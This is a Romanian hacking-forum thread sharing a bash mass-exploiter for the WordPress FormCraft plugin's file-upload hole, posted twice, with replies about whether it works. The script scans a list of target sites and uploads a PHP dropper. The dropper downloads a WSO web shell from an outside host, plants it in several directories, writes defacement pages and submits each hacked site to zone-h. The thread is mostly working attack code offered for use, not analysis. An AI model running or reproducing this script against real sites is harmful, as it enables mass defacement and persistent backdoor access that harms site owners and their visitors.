Wordpress Plugin Formcraft Exploiter [BASH]

Aerosol · December 8, 2014

Credit's to: CoupDeGrace

#!/bin/bash
#Coded By Gantengers Crews ?2013-2014

read -p "List Target = " list
if [ ! -f $list ];then
echo " + List target tdk ada cuk.. "
exit 
fi
FCK=$RANDOM
if [ ! -d tmp ];then
mkdir tmp
fi
if [ ! -d log ];then
mkdir log
fi

if [ ! -f cdg.php ];then
cat > cdg.php <<_EOF
<?php \$sh = file_get_contents("http://coup-de-grace.org/wso.txt");\$file="<title>Hacked by CoupDeGrace</title><center><div id=q>Gantengers Crew<br><font size=2>SultanHaikal - d3b~X - Brian Kamikaze - Coupdegrace - Mdn_newbie - Index Php <style>body{overflow:hidden;background-color:black}#q{font:40px impact;color:white;position:absolute;left:0;right:0;top:43%}";  \$path = \$_SERVER["DOCUMENT_ROOT"];  \$r=fopen(\$path."/lol.html", "w");fwrite(\$r,\$file);fclose(\$r);\$r=fopen(\$path."/images/lol.html", "w");fwrite(\$r,\$file);fclose(\$r);\$r=fopen(\$path."/wp-content/lol.html", "w");fwrite(\$r,\$file);fclose(\$r);\$r=fopen(\$path."/cdg.php", "w");fwrite(\$r,\$sh);fclose(\$r);\$r=fopen(\$path."/images/cdg.php", "w");fwrite(\$r,\$sh);fclose(\$r);\$r=fopen(\$path."/wp-content/cdg.php", "w");fwrite(\$r,\$sh);fclose(\$r);echo CoupDeGrace;unlink(__FILE__); ?>
_EOF
fi

CekDFC(){
czone=${2}
if [ -f tmp/${FCK}gck.txt ];then
  rm -f tmp/${FCK}gck.txt
fi
if [ -f tmp/${FCK}hasil.txt ];then
  rm -f tmp/${FCK}hasil.txt
fi
curl --silent --max-time 10 --connect-timeout 10 -A "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0; Trident/5.0)" "${1}" -o tmp/${FCK}gck.txt
  if [ -f tmp/${FCK}gck.txt ];then
    cat tmp/${FCK}gck.txt | grep -i "Hacked by CoupDeGrace" >/dev/null;gck=$?
    if [ $gck -eq 0 ];then
     echo " + File found $1"
     if [ $czone -eq 1 ];then
      echo $1 >> hacked.txt
      echo ${1} > tmp/empes.txt
      ZoneH
     fi
    fi
  fi
}


CekDFC5(){
#echo " - check file $1"
curl --silent --max-time 10 --connect-timeout 10 "${1}" -o tmp/${FCK}w00t
cat tmp/${FCK}w00t | grep -i "CoupDeGrace" >/dev/null;cwot=$?
   if [ $cwot -eq 0 ];then
    echo " + Exploit Berhasil Dilakukan"
    CekDFC "http://${HOSTX}/lol.html" 1
    CekDFC "http://${HOSTX}/wp-content/lol.html" 1
   fi
}


ZoneH(){
if [ -f "tmp/empes.txt" ];then
   urlnya=$(cat tmp/empes.txt)
           curl --silent -d "defacer=CoupDeGrace&domain1=${urlnya}&hackmode=15&reason=1" \
            --header "Host: www.zone-h.org" \
            --header "User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:16.0) Gecko/20100101 Firefox/16.0" \
            --header "Accept-Language: en-US,en;q=0.5" \
            --header "Connection: keep-alive" \
            --header "Referer: http://zone-h.org/notify/single" \
            --request POST "http://zone-h.org/notify/single" -o tmp/${FCK}result1.txt >/dev/null
            cat tmp/${FCK}result1.txt | sed ':a;N;$!ba;s/\n/ /g' | awk '{gsub("<li>","\n")}1' | awk '{gsub("</li>","\n")}1' | grep "name=\"domain" | awk '{gsub(">","?")}1' | awk '{gsub("<","?")}1' | cut -d '?' -f 5 > tmp/${FCK}Result.txt
                FILEDX="tmp/${FCK}Result.txt"
                   RDOM1=$(sed -n '1p' < $FILEDX)
                    echo $RDOM1 | grep -i "OK" >> /dev/null;warnai=$?
                   if [ $warnai -eq 0 ];then
                   echo "$urlnya" >> log/postOK.txt
                   echo "Upload web $urlnya ke Zone-H: OK"
                    else
                   echo "$urlnya" >> log/postError.txt
                   echo "=> Upload to Zone-H $urlnya : ERROR"
                   echo "=> Shell berhasil di upload Mblo http://${HOSTX}/wp-content/cdg.php?ina"
                   fi
    echo "$urlnya" >> log/defaced.txt
fi
continue
}

Coupdegrace(){
curl --silent --max-time 10 --connect-timeout 10 -o tmp/${FCK}resp.txt \
-A "Mozilla/5.0 (Windows; U; Windows NT 5.1; de-LI; rv:1.9.0.16) Gecko/2009120208 Firefox/3.0.16 (.NET CLR 3.5.30729)" \
-F "files[]=@cdg.php" \
--request POST  "http://${HOSTX}/wp-content/plugins/formcraft/file-upload/server/php/index.php"
CekDFC5 "http://${HOSTX}/wp-content/plugins/formcraft/file-upload/server/php/files/cdg.php"
}

Scan(){
curl --silent --max-time 10 --connect-timeout 10 -A "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0; Trident/5.0)" "http://${HOSTX}${XDIR}${1}" -o tmp/${FCK}cvuln
if [ -f tmp/${FCK}cvuln ];then
cat tmp/${FCK}cvuln | grep "$2" >/dev/null;csexy=$?
if [ $csexy -eq 0 ];then
   echo " + Found ${HOSTX}"
   $3
   else
   echo " - Not found ${HOSTX}"
fi
else
echo " - RTO"
fi
rm -f tmp/${FCK}*
}

for HOST in `cat $list`
do
HOSTX=$(echo $HOST | awk '{gsub("http://","")}1')
Scan "/wp-content/plugins/formcraft/file-upload/js/jquery.fileupload.js" "support.xhrFormDataFileUpload" "Coupdegrace"

save the script with .sh format

run the command bash namafile.sh and enter your target list

Edited December 8, 2014 by Aerosol

quadxenon · December 8, 2014

Tu probezi vreo saracie de asta inainte sa pui ?

Aerosol · December 8, 2014

@quadxenon daca nu esti in stare sa faci nici macar atat, scuze dar locul tau nu e aici.

era o problema si anume

Scan "/wp-content/plugins/formcraft/file-upload/js/jquery.fileupload.js" "support.xhrFormDataFileUpload" "Coupdegrace"

trebuia inclusa.

#!/bin/bash
#Coded By Gantengers Crews ?2013-2014

read -p "List Target = " list
if [ ! -f $list ];then
echo " + List target tdk ada cuk.. "
exit 
fi
FCK=$RANDOM
if [ ! -d tmp ];then
mkdir tmp
fi
if [ ! -d log ];then
mkdir log
fi

if [ ! -f cdg.php ];then
cat > cdg.php <<_EOF
<?php \$sh = file_get_contents("http://coup-de-grace.org/wso.txt");\$file="<title>Hacked by CoupDeGrace</title><center><div id=q>Gantengers Crew<br><font size=2>SultanHaikal - d3b~X - Brian Kamikaze - Coupdegrace - Mdn_newbie - Index Php <style>body{overflow:hidden;background-color:black}#q{font:40px impact;color:white;position:absolute;left:0;right:0;top:43%}";  \$path = \$_SERVER["DOCUMENT_ROOT"];  \$r=fopen(\$path."/lol.html", "w");fwrite(\$r,\$file);fclose(\$r);\$r=fopen(\$path."/images/lol.html", "w");fwrite(\$r,\$file);fclose(\$r);\$r=fopen(\$path."/wp-content/lol.html", "w");fwrite(\$r,\$file);fclose(\$r);\$r=fopen(\$path."/cdg.php", "w");fwrite(\$r,\$sh);fclose(\$r);\$r=fopen(\$path."/images/cdg.php", "w");fwrite(\$r,\$sh);fclose(\$r);\$r=fopen(\$path."/wp-content/cdg.php", "w");fwrite(\$r,\$sh);fclose(\$r);echo CoupDeGrace;unlink(__FILE__); ?>
_EOF
fi

CekDFC(){
czone=${2}
if [ -f tmp/${FCK}gck.txt ];then
  rm -f tmp/${FCK}gck.txt
fi
if [ -f tmp/${FCK}hasil.txt ];then
  rm -f tmp/${FCK}hasil.txt
fi
curl --silent --max-time 10 --connect-timeout 10 -A "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0; Trident/5.0)" "${1}" -o tmp/${FCK}gck.txt
  if [ -f tmp/${FCK}gck.txt ];then
    cat tmp/${FCK}gck.txt | grep -i "Hacked by CoupDeGrace" >/dev/null;gck=$?
    if [ $gck -eq 0 ];then
     echo " + File found $1"
     if [ $czone -eq 1 ];then
      echo $1 >> hacked.txt
      echo ${1} > tmp/empes.txt
      ZoneH
     fi
    fi
  fi
}


CekDFC5(){
#echo " - check file $1"
curl --silent --max-time 10 --connect-timeout 10 "${1}" -o tmp/${FCK}w00t
cat tmp/${FCK}w00t | grep -i "CoupDeGrace" >/dev/null;cwot=$?
   if [ $cwot -eq 0 ];then
    echo " + Exploit Berhasil Dilakukan"
    CekDFC "http://${HOSTX}/lol.html" 1
    CekDFC "http://${HOSTX}/wp-content/lol.html" 1
   fi
}


ZoneH(){
if [ -f "tmp/empes.txt" ];then
   urlnya=$(cat tmp/empes.txt)
           curl --silent -d "defacer=CoupDeGrace&domain1=${urlnya}&hackmode=15&reason=1" \
            --header "Host: www.zone-h.org" \
            --header "User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:16.0) Gecko/20100101 Firefox/16.0" \
            --header "Accept-Language: en-US,en;q=0.5" \
            --header "Connection: keep-alive" \
            --header "Referer: http://zone-h.org/notify/single" \
            --request POST "http://zone-h.org/notify/single" -o tmp/${FCK}result1.txt >/dev/null
            cat tmp/${FCK}result1.txt | sed ':a;N;$!ba;s/\n/ /g' | awk '{gsub("<li>","\n")}1' | awk '{gsub("</li>","\n")}1' | grep "name=\"domain" | awk '{gsub(">","?")}1' | awk '{gsub("<","?")}1' | cut -d '?' -f 5 > tmp/${FCK}Result.txt
                FILEDX="tmp/${FCK}Result.txt"
                   RDOM1=$(sed -n '1p' < $FILEDX)
                    echo $RDOM1 | grep -i "OK" >> /dev/null;warnai=$?
                   if [ $warnai -eq 0 ];then
                   echo "$urlnya" >> log/postOK.txt
                   echo "Upload web $urlnya ke Zone-H: OK"
                    else
                   echo "$urlnya" >> log/postError.txt
                   echo "=> Upload to Zone-H $urlnya : ERROR"
                   echo "=> Shell berhasil di upload Mblo http://${HOSTX}/wp-content/cdg.php?ina"
                   fi
    echo "$urlnya" >> log/defaced.txt
fi
continue
}

Coupdegrace(){
curl --silent --max-time 10 --connect-timeout 10 -o tmp/${FCK}resp.txt \
-A "Mozilla/5.0 (Windows; U; Windows NT 5.1; de-LI; rv:1.9.0.16) Gecko/2009120208 Firefox/3.0.16 (.NET CLR 3.5.30729)" \
-F "files[]=@cdg.php" \
--request POST  "http://${HOSTX}/wp-content/plugins/formcraft/file-upload/server/php/index.php"
CekDFC5 "http://${HOSTX}/wp-content/plugins/formcraft/file-upload/server/php/files/cdg.php"
}

Scan(){
curl --silent --max-time 10 --connect-timeout 10 -A "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0; Trident/5.0)" "http://${HOSTX}${XDIR}${1}" -o tmp/${FCK}cvuln
if [ -f tmp/${FCK}cvuln ];then
cat tmp/${FCK}cvuln | grep "$2" >/dev/null;csexy=$?
if [ $csexy -eq 0 ];then
   echo " + Found ${HOSTX}"
   $3
   else
   echo " - Not found ${HOSTX}"
fi
else
echo " - RTO"
fi
rm -f tmp/${FCK}*
}

for HOST in `cat $list`
do
HOSTX=$(echo $HOST | awk '{gsub("http://","")}1')
Scan "/wp-content/plugins/formcraft/file-upload/js/jquery.fileupload.js" "support.xhrFormDataFileUpload" "Coupdegrace"

cat despre testat acesta nu l-am testat fiindca e luat de pe un site de incredere.

Pe viitor te-as ruga sa nu mai faci offtopic la posturile mele...

Edited December 8, 2014 by Aerosol

quadxenon · December 8, 2014

Ba bolovanule , probasem ala ca eram sigur ca postezi fara sa testezi, nu ca m-ar fi interesat.Si da, nu le am cu programare,Linux sau alte chestii. Imi petrec timpul cu altceva decat sa stau 23 ore din 24 forum.

florinul · December 8, 2014

nu merge nici la mine cum adica trebuie inclusa?

Aerosol · December 9, 2014

@florinul ai incercat cu al doilea cod si ai facut tot ce am zis?

florinul · December 9, 2014

aerosol am incercat si tot da eroarea care am postat-o mai sus . mai da odata quote la cod gata modificat cum ar trebuii sa mearga sa mai incerc odata ..

Eric · December 10, 2014

aerosol am incercat si tot da eroarea care am postat-o mai sus . mai da odata quote la cod gata modificat cum ar trebuii sa mearga sa mai incerc odata ..

de ce ? ca sa vinzi iar pe site-urile de profil ce fixeaza baietii de pe rst?

CoupDeGrace · January 21, 2015

Simple , if u have error just convert with command dos2unix yourfile.sh

u can contact me @ coupdegracegantengers@yahoo.co.id / or facebook : Coup De Grace | Facebook

Sign In

Wordpress Plugin Formcraft Exploiter [BASH]

Recommended Posts

Aerosol

Link to comment

Share on other sites

quadxenon

Link to comment

Share on other sites

Aerosol

Link to comment

Share on other sites

quadxenon

Link to comment

Share on other sites

florinul

Link to comment

Share on other sites

Aerosol

Link to comment

Share on other sites

florinul

Link to comment

Share on other sites

Eric

Link to comment

Share on other sites

CoupDeGrace

Link to comment

Share on other sites

Join the conversation

Browse

Activity

Pages